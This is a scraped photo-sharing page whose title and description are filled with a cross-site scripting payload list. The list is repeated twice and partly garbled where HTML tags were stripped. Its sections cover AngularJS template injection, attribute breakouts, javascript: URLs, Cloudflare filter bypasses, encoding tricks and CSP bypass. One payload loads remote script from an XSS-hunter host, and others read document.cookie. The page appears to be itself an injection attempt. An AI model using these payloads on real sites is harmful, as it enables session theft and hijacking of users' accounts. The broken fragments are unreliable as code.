Back to photostream

A'"></script><h1>{{8*8}}

'"></title></textarea></script></iframe></noscript><img src=x onerror=alert()>{{constructor.constructor('alert(1)')()}}

//Angular JS:

 

{{constructor.constructor('alert(1)')()}}

 

{{

constructor.constructor("var _ = document.createElement('script');

_.src='https://prsua.xss.ht';

document.getElementsByTagName('body')[0].appendChild(_)")()

}}

 

 

// FUZZING:

 

A'">{{8*8}}

 

%uff1cimg%uff1e

 

><img>

 

 

// HTML and JS

 

click

 

 

 

Click

 

'">

 

'">

 

<>

 

 

 

">

 

 

 

">

 

 

 

 

 

 

 

": '';">

 

audio{a" onerror=alert(document.domain)>":""}

 

'">alert`_Y000!_`

 

${alert(1)}"'-alert()-'"

 

'">{{constructor.constructor('alert(1)')()}}

 

A'">

 

“>

 

A'">{{constructor.constructor('alert(1)')()}}

 

'">

 

A'">S

 

A'">

 

test

 

A'">

 

A'">

 

A'">

 

A'">Try to copy me

 

A'"> // Shortest payload

 

A'">

 

 

 

A'">Test

 

 

// HTML Injection (If XSS execution and Dangling markup is not working):

 

TEST

 

 

 

 

// tag URL and tag:

 

javascript:alert(9);//https://www.netigate.net/dd

 

javascript:var{a:onerror}={a:alert};throw document.cookie //Cloudflare XSS bypass

 

javascript:var{a:onerror}={a:alert};throw 1

 

test //Cloudflare and Filter Bypass by XPLOITERR

 

"+self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])// //Cloudflare XSS bypass

 

 

www.brutelogic.com.br/1.js

 

javascript:alert(document.domain)//http://google.com/uploads/pwned.jpg

 

Xp

 

javascript://%0Aalert(document.domain)

 

javascript:alert(document.cookie);

 

%27;alert(1);//

 

\"+confirm(1)+"

 

'*alert(1)*'

 

 

// Encoding

 

><img src=x onerror=alert()>

 

'"></title></textarea></script></iframe></noscript><img onerror=prompt() src=x>

 

A></title><</script><img src=x onerror=[1].find(alert)>

 

<svg/onload&equals;alert(1)>

 

"&gt;&lt;img src=x onerror=alert(document.domain)&gt;

 

 

// Inside attribute value break by ":

 

"onfocus=alert() autofocus="

 

"'-alert(document.body.innerHTML='XPLOITERR')-'"

 

"type=xx autofocus onfocus=alert(1)//

 

"onmouseover=document.documentElement.textContent=document.documentElement.outerHTML c="

 

"onmouseover=javascript:window.onerror=alert;throw[1] c=" (When () `` are blocked)

 

"onmouseover=javascript:window.throw[onerror]=[alert],1

 

a=8,b=confirm,c=window,c.onerror=b;throw-a

 

"onmouseover=alert(1) //

 

"autofocus onfocus=alert(1) //

 

 

// JS literal XSS:

 

${alert(1)}

 

 

// Hidden fields:

 

" accesskey="X" ONCLICK=confirm() X="

 

"accesskey='x' onclick='confirm`1`' //

 

%2527x%2527%2520onclick=%2527confirm`1`%2527%2520

 

//CSS XSS

 

">

@keyframes

 

x{}>

 

CSS<

 

">

 

 

// JSON:

 

{

"url":"javascript://test%0aalert(document.domain)"

}

 

// CSP BYPASS:

 

">

542 views
0 faves
5 comments
Uploaded on November 20, 2021

'"></title></textarea></script></iframe></noscript><img src=x onerror=alert()>{{constructor.constructor('alert(1)')()}}

//Angular JS:

 

{{constructor.constructor('alert(1)')()}}

 

{{

constructor.constructor("var _ = document.createElement('script');

_.src='https://prsua.xss.ht';

document.getElementsByTagName('body')[0].appendChild(_)")()

}}

 

 

// FUZZING:

 

A'">{{8*8}}

 

%uff1cimg%uff1e

 

><img>

 

 

// HTML and JS

 

click

 

 

 

Click

 

'">

 

'">

 

<>

 

 

 

">

 

 

 

">

 

 

 

 

 

 

 

": '';">

 

audio{a" onerror=alert(document.domain)>":""}

 

'">alert`_Y000!_`

 

${alert(1)}"'-alert()-'"

 

'">{{constructor.constructor('alert(1)')()}}

 

A'">

 

“>

 

A'">{{constructor.constructor('alert(1)')()}}

 

'">

 

A'">S

 

A'">

 

test

 

A'">

 

A'">

 

A'">

 

A'">Try to copy me

 

A'"> // Shortest payload

 

A'">

 

 

 

A'">Test

 

 

// HTML Injection (If XSS execution and Dangling markup is not working):

 

TEST

 

 

 

 

// tag URL and tag:

 

javascript:alert(9);//https://www.netigate.net/dd

 

javascript:var{a:onerror}={a:alert};throw document.cookie //Cloudflare XSS bypass

 

javascript:var{a:onerror}={a:alert};throw 1

 

test //Cloudflare and Filter Bypass by XPLOITERR

 

"+self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])// //Cloudflare XSS bypass

 

 

www.brutelogic.com.br/1.js

 

javascript:alert(document.domain)//http://google.com/uploads/pwned.jpg

 

Xp

 

javascript://%0Aalert(document.domain)

 

javascript:alert(document.cookie);

 

%27;alert(1);//

 

\"+confirm(1)+"

 

'*alert(1)*'

 

 

// Encoding

 

><img src=x onerror=alert()>

 

'"></title></textarea></script></iframe></noscript><img onerror=prompt() src=x>

 

A></title><</script><img src=x onerror=[1].find(alert)>

 

<svg/onload&equals;alert(1)>

 

"&gt;&lt;img src=x onerror=alert(document.domain)&gt;

 

 

// Inside attribute value break by ":

 

"onfocus=alert() autofocus="

 

"'-alert(document.body.innerHTML='XPLOITERR')-'"

 

"type=xx autofocus onfocus=alert(1)//

 

"onmouseover=document.documentElement.textContent=document.documentElement.outerHTML c="

 

"onmouseover=javascript:window.onerror=alert;throw[1] c=" (When () `` are blocked)

 

"onmouseover=javascript:window.throw[onerror]=[alert],1

 

a=8,b=confirm,c=window,c.onerror=b;throw-a

 

"onmouseover=alert(1) //

 

"autofocus onfocus=alert(1) //

 

 

// JS literal XSS:

 

${alert(1)}

 

 

// Hidden fields:

 

" accesskey="X" ONCLICK=confirm() X="

 

"accesskey='x' onclick='confirm`1`' //

 

%2527x%2527%2520onclick=%2527confirm`1`%2527%2520

 

//CSS XSS

 

">

@keyframes

 

x{}>

 

CSS<

 

">

 

 

// JSON:

 

{

"url":"javascript://test%0aalert(document.domain)"

}

 

// CSP BYPASS:

 

">

542 views
0 faves
5 comments
Uploaded on November 20, 2021
All rights reserved